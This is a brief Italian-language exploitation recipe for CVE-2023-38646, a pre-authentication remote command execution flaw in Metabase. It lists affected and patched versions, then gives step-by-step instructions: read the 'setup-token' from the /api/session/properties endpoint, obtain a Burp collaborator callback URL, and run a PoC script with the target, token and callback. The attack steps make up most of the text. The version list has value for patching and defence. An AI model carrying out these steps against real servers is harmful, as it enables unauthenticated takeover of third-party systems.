
Metabase RCE pre-autenticazione

Metabase open source precedente alla 0.46.6.1 e Metabase Enterprise precedente alla 1.46.6.1 consentono agli attaccanti di eseguire comandi arbitrari sul server, al livello di privilegio del server. L'autenticazione non è richiesta per lo sfruttamento. Le altre versioni corrette sono 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2 e 1.43.7.2.
Naviga su http://vulnerablehost.com/api/session/properties
Individua "setup-token"

Ottieni un URL del collaborator (testato con BurpSuite)
Esegui lo script del PoC con:
python3 CVE-2023-38646.py -u <target> -t <setup-token> -c <collaborator-url>